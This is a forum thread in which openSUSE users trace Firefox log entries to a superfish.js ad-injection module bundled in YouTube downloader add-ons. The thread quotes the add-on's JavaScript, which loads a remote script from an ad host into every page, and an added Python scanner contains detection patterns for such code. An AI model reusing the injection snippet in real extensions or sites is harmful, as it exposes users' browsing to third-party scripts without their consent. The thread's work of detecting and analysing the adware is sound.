Mozilla Adware Superfish

One of my users is causing logs to fill constantly with repeating lines. Seeking why, I found superfish mentioned here:

https://forums.opensuse.org/showthread.php/505448-Lenovo-PCs-ship-with-extremely-dangerous-man-in-the-middle-adware-(-Windows-)?p=2696912#post2696912

with links to further info :

Lenovo slapped with lawsuit over dangerous Superfish adware | PCWorld

with comment:

A proposed class-action suit was filed late last week against Lenovo and Superfish, which charges both companies with “fraudulent” business practices and of making Lenovo PCs vulnerable to malware and malicious attacks by pre-loading the adware.

Plaintiff Jessica Bennett said her laptop was damaged as a result of Superfish, which was called “spyware” in court documents. She also accused Lenovo and Superfish of invading her privacy and making money by studying her Internet browsing habits.

Software Privdog worse than Superfish - Hanno's blog

with comment:

There is a software called Privdog. It totally breaks HTTPS security in a similar way as Superfish.

providing reference to article: Facebook

where written:

Superfish uses a third party library from a company named Komodia to modify the Windows networking stack and install a new root Certificate Authority (CA), allowing Superfish to impersonate any SSL-enabled site. The new root CA undermines the security of web browsers and operating systems, putting people at greater risk. The stated reason for this inspection functionality is to enable the Superfish Visual Search capability that looks at people’s search queries and makes suggestions based on proprietary processes.

more worrying:

the Superfish software can see all of the computer user’s activity, including banking, email and Facebook traffic. The second problem is the use and installation of a new root CA,


Aug 04 08:09:24 linux-52pn firefox.desktop[13318]: Insert superfish into: about:preferences
Aug 04 08:09:25 linux-52pn firefox.desktop[13318]: Insert superfish into: about:blank
Aug 04 08:09:47 linux-52pn firefox.desktop[13318]: Insert superfish into: about:addons
Aug 04 08:09:47 linux-52pn firefox.desktop[13318]: Insert superfish into: about:newtab
Aug 04 08:09:50 linux-52pn firefox.desktop[13318]: Insert superfish into: https://services.addons.mozilla.org/en-US/firefox/discovery/pane/38.0.1/Linux/normal#{%22{972ce4c6-7e08-4474-a285-3208198ce6fd}%22:{%22name%22:%22Default%22,%22version%22:%2238.0.1%22,%22type%22:%22theme%22,%22userDisabled%22:true,%22isCompatible%22:true,%22isBlocklisted%22:false},%22susefox@opensuse.org%22:{%22name%22:%22openSUSE%20Firefox%20Extensions%22,%22version%22:%221.0.2%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22jid1-OoNOA6XBjznvLQ@jetpack%22:{%22name%22:%22GNotifier%22,%22version%22:%221.8.5%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22jid1-KWFaW5zc0EbtBQ@jetpack%22:{%22name%22:%22YouTube%20Video%20Downloader%20-%20For%20Context%20Menu%22,%22version%22:%220.1.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22info@youtube-mp3.org%22:{%22name%22:%22YouTube%20mp3%22,%22version%22:%221.0.9.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22paulsaintuzb@gmail.com%22:{%22name%22:%22Youtube%20Downloader%20-%204K%20Download%22,%22version%22:%225.7.4.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22captiondownloader@hiephm.com%22:{%22name%22:%22YouTube%20Caption%20Downloader%22,%22version%22:%222.3.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22626160@personas.mozilla.org%22:{%22name%22:%22Cola%22,%22version%22:%220%22,%22type%22:%22theme%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22gmp-gmpopenh264%22:{%22name%22:%22OpenH264%20Video%20Codec%20provided%20by%20Cisco%20Systems,%20Inc.%22,%22version%22:%221.4%22,%22type%22:%22plugin%22,%22userDisabled%22:false,%2
2isCompatible%22:true,%22isBlocklisted%22:false},%22{0ac05972-878a-da26-5064-b268835efaa5}%22:{%22n
Aug 04 08:09:56 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update


The app seems to insert into pages opened by the browser:


Aug 04 08:09:56 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update
Aug 04 08:11:46 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update
Aug 04 08:12:12 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com/?q=current%20version%20plugin%20Native%20Client
Aug 04 08:12:12 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com/post2.html
Aug 04 08:12:31 linux-52pn firefox.desktop[13318]: Insert superfish into: https://en.wikipedia.org/wiki/Google_Native_Client
Aug 04 08:13:35 linux-52pn firefox.desktop[13318]: Insert superfish into: about:newtab
Aug 04 08:13:41 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com

For now it appears superfish was removed with the app: Youtube Downloader 4K - Video Downloader 5.7.4.1-signed
The App: https://addons.mozilla.org/en-US/firefox/addon/media-downloader/
Version 5.7.4.1-signed Info
April 23, 2015
Released under Mozilla Public License, version 2.0

How to prevent it being re-installed?

And on which version of openSUSE are you seeing this?

On 2015-08-04 06:56, paulparker wrote:
>
> One of my users is causing logs to fill constantly with repeating lines.
> Seeking why, I found superfish mentioned here:

And what openSUSE version is that user with problems using? And what
Firefox? I tried searching for a superfish plugin or addon, and I didn’t
find any.


Cheers / Saludos,

Carlos E. R.

(from 13.1 x86_64 “Bottle” (Minas Tirith))

this is a strange thread, afaik there is no superfish for linux, it seems the addon you got scans web pages to detect embedded videos, that’s what you wanted isn’t it, as google goes out of its way to prevent grabbing youtube content, mozilla usually scans addons for malware but anything is possible, I can tell you what I use to grab videos.
For youtube only
https://addons.mozilla.org/en-us/firefox/addon/download-youtube/
for most other sites including youtube I use flashgot (it has a media detector)
https://addons.mozilla.org/en-us/firefox/addon/flashgot/
none of these work with mms, but that’s a different issue.

ps the above addons are both open source and if you try looking for it you can find it, I do believe they’re clean.

For now it appears superfish was removed with the app: Youtube Downloader 4K - Video Downloader 5.7.4.1-signed
The App: https://addons.mozilla.org/en-US/fir…ia-downloader/
Version 5.7.4.1-signed Info
April 23, 2015
Released under Mozilla Public License, version 2.0

I checked that plugin (https://addons.mozilla.org/en-US/firefox/addon/media-downloader/ ) and it’s clean, the reason it’s so big (10.2MiB) is it carries binary copies of ffmpeg for 2 platforms (Win and OS-X).
I’m re-reading your post and can’t make heads or tails of it.
superfish is a windows binary it can do nothing under Linux, did you maybe use mozilla sync and import something from Windows, even with sync Firefox only syncs addons from its site and a win dll on its own running under a regular user account can do very little under Linux, worst case scenario delete your ~/.mozilla folder and create a new clean profile.

browsing the content of
https://addons.mozilla.org/firefox/downloads/latest/456252/addon-456252-latest.xpi
I see a file called
superfish.js
from the content of that file I’m thinking it could be an ad injector although it could be malware it has nothing to do with Lenovo’s man in the middle attack, the js code is there (in the link and in the xpi) you can check it out, I’m surprised mozilla hasn’t removed this add-on, maybe injecting ads isn’t thought of as a bad thing as every toolbar does it?
In short you weren’t a victim of Lenovo’s man in the middle blunder, you were a victim of an ad injector, that add-on is bad there are better ones (see the ones I mentioned a few posts above), being MPL this proves that even open source projects can make bad choices (mediainfo includes adware in its windows binaries) unfortunately it’s the way the internet works (on ads), I would say get yourself an ad blocker but that’s your choice.

On 2015-08-04 22:06, I A wrote:

> I’m re-reading your post and can’t make heads or tails of it.
> superfish is a windows binary it can do nothing under Linux, did you
> maybe use mozilla sync and import something from Windows, even with sync

I’m now guessing that he is admin for a network, and one of the users
there, using a Windows machine, has that thing. And he wants to block it
externally, perhaps in the firewall. Or something of the sort.

I don’t think that’s possible. That malware inserts or replaces a master
root certificate, on the system. Any false site those people want to,
will be certified to be the proper web page for your bank, when it is
instead a mafia site — but the browser will say it is the correct site.
You can do nothing externally to avoid this situation.

What I would do, perhaps, is install Windows Server in a machine, create
a domain, then force all machines to only log in that Windows Domain
(AD), and then impose my own rules. AD allows very fine controls on
programs and users. Specifically, you can deny them the right to install
software.

I don’t know if this is doable via samba 4 and ldap. They are trying.

If AD is not an option, then I would give users only user accounts, not
privileged accounts. Anybody that complains and fights, fired. >:-)


Cheers / Saludos,

Carlos E. R.
(from 13.1 x86_64 “Bottle” at Telcontar)

On 2015-08-04 22:26, I A wrote:
>
> browsing the content of
> http://tinyurl.com/od4l52s


https://addons.mozilla.org/firefox/downloads/latest/456252/addon-456252-latest.xpi

What’s the name of that addon? :-?

> In short you weren’t a victim of Lenovo’s man in the middle blunder, you
> were a victim of an ad injector, that add-on is bad there are better
> ones (see the ones I mentioned a few posts above), being MPL this
> proves that even open source projects can make bad choices (mediainfo
> includes adware in its windows binaries) unfortunately it’s the way the
> internet works (on ads), I would say get yourself an ad blocker but
> that’s your choice.

wow :-o

Maybe that addon could be reported to mozilla people. :-?


Cheers / Saludos,

Carlos E. R.
(from 13.1 x86_64 “Bottle” at Telcontar)

the name of the addon is
Youtube Downloader 4K - Video Downloader
the problem with it is this part




            //var injectUrl = "www.superfish.com/ws/sf_main.jsp?dlsource=ylrckcg&CTID=ffpauldn";
            var injectUrl = "www.best-deals-products.com/ws/sf_main.jsp?dlsource=ylrckcg&CTID=ffpauldn";

            if( document.location.href.indexOf("https:") === 0 ){
                injectUrl = "https://" + injectUrl;
            }
            else{
                injectUrl = "http://" + injectUrl;
            }

            var script = document.createElement("script");
            script.setAttribute( "src", injectUrl );
            document.head.appendChild( script );

        }

    }



re-reading the content of the js it does seem to be connected with www.superfish.com and those are the same people that did the MiM deal with Lenovo, but as far as I can tell this addon, injects ads on certain sites it does not do a classic MiM attack

edit.
I was just at mozilla’s site (as a logged in user) and there doesn’t seem to be a way to report “bad addons”, the only thing you could do is write a bad review. That’s disappointing seeing how mozilla plans on blocking all add-ons that do not come from addons.mozilla.org and don’t have a signature
Mozilla to Enforce Signing for Firefox Extensions Soon | Threatpost
this proves that even signed and checked addons are not safe.

On 2015-08-04 23:06, I A wrote:

> the name of the addon is
> Youtube Downloader 4K - Video Downloader

Huh. I have:

“Flash Video Downloader - YouTube HD Downloader [4K] 7.3.1.1-signed”, by
pos1t1ve. Homepage is http://www.flashvideodownloader.org/

Is it the same? :-?

> the problem with it is this part

> re-reading the content of the js it does seem to be connected with
> www.superfish.com and those are the same people that did the MiM deal
> with Lenovo, but as far as I can tell this addon, injects ads on
> certain sites it does not do a classic MiM attack

Huh.


Cheers / Saludos,

Carlos E. R.
(from 13.1 x86_64 “Bottle” at Telcontar)

it’s not the same add-on but reading the comments on mozilla’s site
https://addons.mozilla.org/en-US/firefox/addon/flash-video-downloader/


Malware Superfish, be careful! Rated 1 out of 5 stars

by amar7 on July 10, 2015 · permalink · translate

Unacceptable that it is not possible to unselect the malware, changes settings and other Firefox things.

The official reply from Mozilla is also disappointing that this is not exactly the definition of malware, so they leave it. So I can’t rely on my Add Ons being Malware free and clean anymore.

thumbsdown


and I just downloaded it from
https://addons.mozilla.org/firefox/downloads/latest/6584/addon-6584-latest.xpi
and yes the file superfish.js is included in
flash_video_downloader_youtube_hd_download_4k-7.3.1-an+fx.xpi\modules\superfish.js (xpi’s are zip’s)
it’s identical with the one from Youtube Downloader 4K - Video Downloader.
and the one you’re using has over a million users.
lol mozilla spreading the injections.

“Flash Video Downloader - YouTube HD Downloader [4K] 7.3.1.1-signed” is bad to remove or not is your choice?

I just re-checked the 2 video download add-ons I use and they both seem clean (they do not include that bad js)
https://addons.mozilla.org/en-us/firefox/addon/download-youtube/
https://addons.mozilla.org/en-us/firefox/addon/flashgot/

but this is a terrible practice from mozilla what am I supposed to check every add-on to be sure it doesn’t have adware?
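
An added example, not part of any post in this thread: since an .xpi is a zip archive, the manual check described above (looking inside an add-on for script-injection code such as superfish.js) can be automated. The regex heuristics, function names and the in-memory sample archive are assumptions made for this illustration; the sample's JavaScript is constructed from the snippet quoted earlier in the thread.

```python
import io
import re
import sys
import zipfile

# Heuristics modelled on the snippet quoted in this thread: the code creates a
# <script> element, sets its src, and names a remote host in a string literal.
CREATE_SCRIPT = re.compile(r"""createElement\(\s*["']script["']\s*\)""")
SET_SRC = re.compile(r"""setAttribute\(\s*["']src["']|\.src\s*=""")
HOST = re.compile(r"""["'](?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})/[^"'\s]*["']""", re.I)


def remote_script_hosts(js_text):
    """Return the hosts named in js_text if it builds a <script> and sets its src."""
    if not (CREATE_SCRIPT.search(js_text) and SET_SRC.search(js_text)):
        return []
    # Hosts in commented-out lines are reported too; they show where code came from.
    return sorted({host.lower() for host in HOST.findall(js_text)})


def scan_xpi(xpi):
    """xpi is a path or a file-like object. Returns {member name: [hosts]}."""
    findings = {}
    with zipfile.ZipFile(xpi) as archive:
        for name in archive.namelist():
            if not name.lower().endswith((".js", ".jsm")):
                continue
            text = archive.read(name).decode("utf-8", errors="replace")
            hosts = remote_script_hosts(text)
            if hosts:
                findings[name] = hosts
    return findings


def build_sample_xpi():
    """Constructed sample archive: one injector file and one harmless UI file."""
    injector = '''
    //var injectUrl = "www.superfish.com/ws/sf_main.jsp?dlsource=ylrckcg&CTID=ffpauldn";
    var injectUrl = "www.best-deals-products.com/ws/sf_main.jsp?dlsource=ylrckcg&CTID=ffpauldn";
    var script = document.createElement("script");
    script.setAttribute( "src", injectUrl );
    document.head.appendChild( script );
    '''
    benign = 'var label = document.createElement("span"); label.textContent = "ok";'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("modules/superfish.js", injector)
        archive.writestr("chrome/content/ui.js", benign)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    # Pass .xpi paths on the command line, or run with no arguments for the sample.
    for target in sys.argv[1:] or [build_sample_xpi()]:
        for member, hosts in scan_xpi(target).items():
            print(f"{target}: {member} loads a script from {', '.join(hosts)}")
```

A hit only means the file is worth reading by hand; legitimate add-ons may also load remote scripts, and an injector written differently will not match these patterns.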

It would appear that on Aug 4, I A did say: {liberally snipped}

> it’s not the same add-on but reading the comments on mozilla’s site
> > THE OFFICIAL REPLY FROM MOZILLA IS ALSO DISAPPOINTING THAT THIS IS NOT
> > EXACTLY THE DEFINITION OF MALWARE, SO THEY LEAVE IT. SO I CANT RELY ON
> > MY ADD ONS BEING MALWARE FREE AND CLEAN ANYMORE.
> and yes the file superfish.js is included in
> flash_video_downloader_youtube_hd_download_4k-7.3.1-an+fx.xpi\modules\superfish.js
> (xpi’s are zip’s)
> it’s identical with the one from Youtube Downloader 4K - Video
> Downloader.
> “Flash Video Downloader - YouTube HD Downloader [4K] 7.3.1.1-signed” is
> bad to remove or not is your choice?
>
> I just re-checked the 2 video download add-ons I use and they both seem
> clean (they do not include that bad js)
> https://addons.mozilla.org/en-us/firefox/addon/download-youtube/
> https://addons.mozilla.org/en-us/firefox/addon/flashgot/
>
> but this is a terrible practice from mozilla what am I supposed to check
> every add-on to be sure it doesn’t have adware?

Damn. And I thought Firefox was supposed to be a security conscious browser.

Anybody know if my favorite downloader is clean or dirty?

it’s “MP4 Downloader 1.3.3.1-signed”

from http://jhartz.github.io/mp4downloader/


JtWdyP

got a copy from here
MP4 YouTube Downloader 1.3.3.1-signed
https://addons.mozilla.org/en-US/firefox/addon/mp4-downloader/
looks clean to me ie it does not include Superfish.js

ps regarding robin_listas question about Flash Video Downloader - YouTube HD Downloader [4K] 7.3.1.1-signed
they do write that their add-on includes adware and it’s supposed to be off by default, from
https://addons.mozilla.org/en-US/firefox/addon/flash-video-downloader/

Please note, that we inject optional ads (Superfish). If you do not want to support us, you can turn them off in extension setting. Superfish ads are disabled by default and promoted in Opt-In dialog box according to Mozilla non-surprise police. Superfish help users to enhance their shopping experience and save money. To know more, please read our policy or contact them directly.

I really don’t know about mozilla’s policy.

On 2015-08-05 01:18, JtWdyP wrote:

> Damn. And I thought Firefox was supposed to be a security conscious browser.

But addons are not really part of Firefox. They are third party.


Cheers / Saludos,

Carlos E. R.

(from 13.1 x86_64 “Bottle” (Minas Tirith))

On 2015-08-05 01:56, I A wrote:

> ps regarding robin_listas question about Flash Video Downloader -
> YouTube HD Downloader [4K] 7.3.1.1-signed

> they do write that their add-on includes adware and it’s supposed to be
> off by default, from
> http://tinyurl.com/k8rpzyy
>> Please note, that we inject optional ads (Superfish). If you do not want
>> to support us, you can turn them off in extension setting. Superfish
>> ads are disabled by default and promoted in Opt-In dialog box according
>> to Mozilla non-surprise police. Superfish help users to enhance their
>> shopping experience and save money. To know more, please read our policy
>> or contact them directly.

Well, I have removed it.

When I installed it some time ago I didn’t see the comments about
superfish. It seems they added this thing later on.

What I haven’t noticed is when are the adverts shown? I haven’t noticed
any :-? What do they do, track the pages I browse, even without
downloading videos?

Anyway, I mostly used the addon to find out possible download streams.
The real download I usually do from the CLI, with a command I got from
packman :wink:

Now I will always look and download from the CLI.


Cheers / Saludos,

Carlos E. R.

(from 13.1 x86_64 “Bottle” (Minas Tirith))

First up thanks to all for your replies ;- )

My place usually runs two personal computers operating using openSUSE 13.2 GNOME with my backup machine used by resident teen and visitors.

Was searching for what was causing logs on my backup machine (used by teens & visitors) to constantly fill up with “firefox.desktop” “console.error” messages.

My attention focused quickly on the words “Insert superfish into”, apparently for every web page opened by the user’s Mozilla, then quickly found information about superfish as a bug or abusive software.

Applications chosen and installed by individual users (this time Mozilla) increase risk.

Removed the teen user’s Mozilla apps and required he set himself a new password.

Other users of same computer, self included, displayed no indication of similar issues.

Felt best post about here for wiser minds to consider :- )